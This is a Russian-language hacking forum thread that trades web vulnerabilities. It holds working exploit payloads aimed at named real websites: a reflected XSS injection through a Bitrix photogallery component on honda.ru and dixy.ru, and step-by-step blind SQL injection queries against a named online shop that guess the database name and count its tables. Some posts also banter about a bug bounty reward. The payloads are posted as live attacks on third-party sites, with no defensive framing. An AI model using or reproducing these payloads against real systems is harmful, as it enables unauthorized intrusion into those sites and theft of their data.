Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    632
    Likes Received:
    1,316
    Reputations:
    408
    Code:
    https://honda.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){//
    https://dixy.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){//
    
     
    erwerr2321, fandor9, alexzir and 4 others like this.
  2. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,041
    Likes Received:
    24,821
    Reputations:
    137
    Это по сути песочница. Один пейлоад стрелял сразу в нескольких местах:
    на ифраме-толока.ком и на sandbox.ифраме-толока.ком. Но там тоже ни кук, ни импэкта))
    Но было ещё и третье место, откуда он постреливал. :)
    И вот только вчера прилетело письмецо в конверте.

    yabbletter.png
     
  3. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    496
    Likes Received:
    95
    Reputations:
    24
    А моя доля? На шаверму
     
  4. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,041
    Likes Received:
    24,821
    Reputations:
    137
    Шта? :eek:
    Я её намного раньше тебя запостил! я ж писал тебе tracking ID и time 1619951822533
    Ни гани!
     
    #344 erwerr2321, 24 Oct 2021
    Last edited: 24 Oct 2021
    Octavian likes this.
  5. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    69
    Likes Received:
    7
    Reputations:
    0
  6. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    69
    Likes Received:
    7
    Reputations:
    0
  7. ZeV$

    ZeV$ Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    40
    Likes Received:
    10
    Reputations:
    3
    digging blind sqli
    *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'a%') AND '9'='9
    *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'b%') AND '9'='9
    ...
    *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'n%') AND '9'='9


    *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND ((SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES) BETWEEN 0 AND 2) AND '9'='9
    *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND ((SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES) BETWEEN 0 AND 333) AND '9'='9
     
Loading...